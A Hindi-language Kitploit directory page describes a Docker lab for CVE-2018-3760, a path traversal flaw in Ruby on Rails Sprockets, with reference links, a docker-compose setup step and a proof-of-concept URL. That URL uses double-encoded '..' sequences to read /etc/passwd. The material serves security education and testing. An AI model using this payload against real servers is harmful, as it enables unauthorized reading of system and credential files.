Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760- — CVE-2018-3760 पथ ट्रैवर्सल को Ruby on Rails Sprockets में प्रदर्शित करने वाला डॉकर-आधारित लैब, सुरक्षा परीक्षण और शिक्षा के लिए POC और वातावरण सेटअप के साथ। | Kitploit
उपकरण/GitHubGitHub/cyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubcyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-

Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-

CVE-2018-3760 पथ ट्रैवर्सल को Ruby on Rails Sprockets में प्रदर्शित करने वाला डॉकर-आधारित लैब, सुरक्षा परीक्षण और शिक्षा के लिए POC और वातावरण सेटअप के साथ।

रिपॉजिटरी देखें
316 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ruby On Rails पथ ट्रैवर्सल भेद्यता(CVE-2018-3760)

चीनी संस्करण(चीनी संस्करण)

Ruby On Rails एक प्रसिद्ध Ruby वेब डेवलपमेंट फ्रेमवर्क है, जो विकास वातावरण में Sprockets को एक स्थैतिक फ़ाइल सर्वर के रूप में उपयोग करता है। Sprockets एक Ruby लाइब्रेरी है जो स्थैतिक संसाधन फ़ाइलों को संकलित और वितरित करती है।

Sprockets 3.7.1 और उससे निचले संस्करणों में द्वितीयक डिकोडिंग के कारण एक पथ ट्रैवर्सल भेद्यता है। एक हमलावर %252e%252e/ का उपयोग करके रूट निर्देशिका तक पहुंच सकता है और लक्ष्य सर्वर पर किसी भी फ़ाइल को पढ़ या निष्पादित कर सकता है।

संदर्भ लिंक:

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • https://seclists.org/oss-sec/2018/q2/210
  • https://xz.aliyun.com/t/2542

वातावरण सेटअप

निम्न कमांड दर्ज करें:

root@kitploit:~
docker-compose up -d

http://your-ip:3000 पर जाएं और आप स्वागत पृष्ठ देखेंगे।

POC

सीधे http://your-ip:3000/assets/file:%2f%2f/etc/passwd पर जाने से एक त्रुटि उत्पन्न होगी, क्योंकि फ़ाइल /etc/passwd अनुमत निर्देशिका में नहीं है।

हम त्रुटि पृष्ठ से अनुमत निर्देशिकाओं की एक सूची प्राप्त कर सकते हैं। बस उनमें से एक चुनें, जैसे /usr/src/blog/app/assets/images, फिर मूल निर्देशिका पर जाने के लिए %252e%252e/ का उपयोग करें, और अंत में फ़ाइल /etc/passwd पढ़ें:

root@kitploit:~
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

टूल डाउनलोड करें